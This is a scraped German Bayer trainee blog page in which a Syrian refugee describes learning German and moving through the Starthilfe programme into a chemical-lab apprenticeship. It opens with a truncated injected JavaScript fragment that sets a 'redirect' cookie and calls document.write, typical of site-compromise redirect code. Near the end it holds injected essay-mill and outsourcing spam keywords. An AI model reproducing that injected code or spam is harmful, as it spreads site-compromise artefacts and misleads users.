=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} "/>

Austausch Ihrer personenbezogenen Daten mit Facebook


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit Google


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit YouTube


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

Ablehnen Akzeptieren

Startseite » Auszubildende » Mein Karrieresprung vom Starthilfe Programm in die Ausbildung
Mein Karrieresprung vom Starthilfe Programm in die Ausbildung

Mein Karrieresprung vom Starthilfe Programm in die Ausbildung

Hallo zusammen! Mein Name ist Feras, ich bin 28 Jahre alt und vor vier Jahren nach Deutschland geflüchtet.

Erstmal zu mir:

Am 09. OktobBild 1er 2014 bin ich nach Deutschland gekommen. Schon am aller ersten Tag habe ich bemerkt, wie wichtig die Sprache hier ist, um weiterzukommen und als Flüchtling Perspektiven zu haben. Deshalb habe ich mir bereits nach wenigen Tagen eine deutsche SIM-Karte gekauft, um mir eigenständig – und mithilfe des Internets – die deutsche Sprache beizubringen. Bereits während meines Aufenthaltes in der Türkei habe ich mit dieser Methode gute Erfahrungen sammeln und mir so das A1 Sprachniveau der türkischen Sprache aneignen können.

Anfangs hatte ich große Schwierigkeiten mich darauf zu konzentrieren die deutsche Sprache zu lernen, da ich für den Asylantrag regelmäßig an andere Orte ziehen musste. Nach insgesamt sechs Umzügen von innerhalb drei Monaten landete ich endlich in Köln. Im Januar 2015 konnte ich mich dann endlich vollends auf das Erlernen der deutschen Sprache konzentrieren und habe mir auch hier selbstständig das A1 Sprachniveau angeeignet. Da die Wartezeit bis zur Genehmigung meines Asylantrages sehr lange dauerte, habe ich hin und wieder überlegt einfach aufzugeben – aber heute blicke ich zurück und bin sehr froh, dass ich es nicht getan habe. Die guten Nachrichten zur Aufenthaltsgenehmigung bekam ich am 21. Mai 2015. Am selben Tag noch ging ich in eine Kölner Sprachschule und habe Gott sei Dank einen Platz im nächst möglichen Integrationskurs bekommen. Im September ging der Integrationskurs dann los. Hier begann ich für das deutsche A2 Sprachzertifikat zu üben bis ich nach etwa sechs Monaten den Kurs erfolgreich abschloss.

Aber wie ging es dann mit mir weiter? ODER besser: wie kam ich zu Bayer?

Als ich in Köln auf einer Ausbildungsmesse war, um mich als syrischer Chemielaborant über meine Möglichkeiten auf dem deutschen Arbeitsmarkt zu informieren, traf ich auf eine Mitarbeiterin der IHK. Sie hat mir direkt Kurse für das deutsche B2 Sprachniveau angeboten und mir die Fortbildungsakademie der Wirtschaft (FAW) vorgestellt. Daraufhin bin ich am nächsten Tag zur FAW gegangen und habe mich für diesen Kurs angemeldet. Zufälligerweise traf ich eine Woche später einen Freund, der sich ebenfalls für diesen Kurs angemeldet hatte. Nachdem wir mit der Schule einen Termin vereinbart hatten, trafen wir den Chef der FAW. Wir sprachen darüber, was ich in meiner Heimat für einen Beruf gelernt habe bzw. studiert habe. Ich war von seinem Interesse überrascht und erzählte, dass ich bereits eine Ausbildung zum Chemielaborant absolviert habe. Er war für die Sprachkurse der Bayer AG in Leverkusen zuständig und zu meinem Glück war auch noch ein Platz im B2 Sprach-Aufbaukurs für Flüchtlinge frei. Somit meldete er mich um – und meine Geschichte bei Bayer fing an. Bevor man jedoch den Platz in diesem Sprachkurs bekam, musste man einen Einstufungstest schaffen, den ich erfolgreich bestand.

Eine Woche vor Kursbeginn teilte uns eine Lehrerin mit, dass wir die Gelegenheit haben, bei Bayer an einem Berufsorientierungsprogramm teilzunehmen: das sogenannte Starthilfe Programm. Der Aufbaukurs dauerte drei Monate. Einen Monat bevor der Kurs abgeschlossen war, teilte man uns jedoch mit, dass das Berufsorientierungsprogramm keine freien Plätze mehr habe. Ich erinnere mich heute noch sehr gut daran, wie frustriert ich an dem Tag war. Eine Woche später hieß es dann, dass doch noch drei Personen teilnehmen konnten – wir waren aber 13 Teilnehmer in dem Sprachkurs.

Um drei Personen unter allen Teilnehmern auszuwählen, hat man uns gebeten bis zum nächsten Tag ein
Bewerbungsschreiben und seinen Lebenslauf zu verschriftlichen. Diese wurden dann eingesammelt und uns wurde mitgeteilt, dass wir eine Einladung zu einem Einstellungstest bekommen werden, welche eine Woche später stattfand. Bis dahin haben wir fleißig Fachbegriffe rund um die Chemie, Mathematik und Physik gelernt. Sechs Personen haben den Test tatsächlich gemacht, von denen drei bestanden– und ich zählte dazu. Die zwei anderen und ich wurden daraufhin zum Vorstellungsgespräch eingeladen und bekamen schlussendlich die Zusage.

Am 30.08.2016 war es dann soweit, der erste Tag im Starthilfe-Programm hatte begonnen. Bild 2
Meine Woche gliederte sich nun in zwei Tage Berufsschule und drei Tage Praxiseinsatz im Betrieb.

Worum geht es in dem Programm eigentlich genau? Es dient dazu, sich für die Zukunft berufsmäßig zu orientieren und bestenfalls einen Beruf zu finden, der zu einem passt.
Da ich ja in Syrien schon meinen Traumberuf ausgeübt hatte, war für mich direkt klar, dass mein Weg auch bei Bayer in diese Richtung gehen soll.
Insgesamt hat man viele verschiedene Fächer, um auch wirklich einen breitgefächerten Eindruck zu bekommen. Darunter zählen zum Beispiel Mathe, Physik, Chemie und Wirtschaft.

Nach zwei Monaten stand das erste Bewerbungstraining an, wir sollten Bewerbungen um einen Ausbildungsplatz in unserem gewünschten Beruf vorbereiten, um diese nachher an die Firmen hier im Chempark zu verschicken.
Relativ zügig habe ich nach dem Verschicken der Bewerbungen zum Chemielaboranten, eine Einladung zum Online-Test bei Bayer erhalten. Diesen habe ich erfolgreich absolviert, wodurch eine Einladung zum persönlichen Gespräch folgte. Auch dieses habe ich gemeistert, sodass ich kurze Zeit später eine Zusage für eine Ausbildung bei Bayer im Briefkasten hatte: YEAH!

Nachdem ich die Zusage erhielt, habe ich direkt einen Termin bei meiner Betreuerin vereinbart, um ihr zu sagen, dass ich gerne – anstatt weiterhin zur Berufsschule zu gehen – mein Deutsch bis zur Ausbildung verbessern möchte. Da dies aber nicht dem normalen Ablauf des Programms entspricht, war dies zunächst gar nicht so einfach… es musste ein weiteres Gespräch mit meiner Koordinatoren von Bayer, sowie dem Ausbildungsleiter von Bayer vereinbart werden, so konnte aber alles geklärt werden und ich wurde für den Sprachkurs freigestellt.
Somit konnte ich ab März 2017 in die Sprachschule, um mein Deutsch Sprachenzertifikat C1 zu absolvieren.

Alles in allem hat mir das Starthilfe-Programm sehr viel gebracht und mir weitere Türen für mein zukünftiges Berufsleben hier bei Bayer geöffnet.

Ich wünsche allen viel Erfolg!

Liebe Grüße
Feras

buy essay papers
write my essay writing services academic paper buy essay essay writing do my paper custom writing writing services check my essay academic paper assignment writing cheap essay writing professional writing best essay writing service argumentative essay writer custom essay custom essay paper writing write my essay website
is magento the best ecommerce platform offshore outsourcing companies list offshore outsourcing company offshore outsourcing company india offshore outsourcing india offshore outsourcing services offshore outsourcing services india offshore outsourcing software development offshore outsourcing software development company offshore outsourcing solutions
Allgemeine Nutzungsbedingungen Datenschutzerklärung Impressum Technische Hinweise
Austausch Ihrer personenbezogenen Daten mit Facebook
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

×
Austausch Ihrer personenbezogenen Daten mit Google
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

×
Austausch Ihrer personenbezogenen Daten mit YouTube
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

×